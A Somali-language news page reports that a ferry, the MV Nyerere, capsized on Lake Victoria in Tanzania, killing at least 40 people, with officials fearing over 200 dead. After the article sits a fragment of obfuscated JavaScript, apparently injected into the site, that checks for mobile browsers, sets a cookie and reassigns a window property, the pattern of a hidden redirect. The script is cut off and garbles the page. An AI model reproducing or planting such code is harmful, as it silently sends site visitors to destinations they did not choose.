Wednesday, January 14, 2026
HomeWararSawirro:- In Ka Badan 40 Qof Oo Ku Dhimatay Doon Weyn Oo...

Sawirro:- In Ka Badan 40 Qof Oo Ku Dhimatay Doon Weyn Oo Ku RogmatayDalka Tanzania

Ugu yaraan 40 qof ayaa dhimatay kaddib markii Doon weyn oo kuwa rakaabka ah oo ay saarnaayeen boqolaal qof ay ku degtay haraha Lake Victoria ee waddanka Tanzania.

Mid ka mid ah saraakiisha dowladda ayaa u sheegay wakaalada wararka ee Reuters in tirada dadka Doonidu la rogmatay ay suuragal tahay inay ka badan tahay 200 oo qof.

Dedaaladda lagu soo samatabixinayo dadkaasi ayaa hakad uu galay ilaa aroortii hore ee saaka oo Jimca ah.

Doonta weyn ee MV Nyerere ayaa ku gadoontay meel u dhaw labada inta u dhexeyso labada jazeeradood ee Ukora iyo Bugolora.

Waxaa loo maleynayaa in sababta doontu ay u rogmatay ay tahay iyada oo si xad dhaaf ah loo raray kaddib makrii dadkii saarnaa ay dhinac ula liicday kaddibna ay gadoontay.

Saraakiisha xukuumadda Tanzania ayaa sheegay in doontu ay siday in ka badan 400 oo qof oo rakaab ah.

Ku dhawaad 100 qof ayaa lasoo samatabixiyay halka 32 qof oo kalena la sheegayo inay xaalad adag ku sugan yihiin.

Inkasta oo tirada rasmiga ah ee shilkan uu khasaaruhu kasoo gaaray aanan wali la xaqiijin ayaa haddana wakaalada wararka ee Reuters waxa ay sheegtay in qofkii qeybinayay tikidhada doonta uu ka mid yahay dadka geeriyooday, iyada oo sidaasina ay ku luntay mashiinkii keydinayay xogta rakaabka saaran doonta.

s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe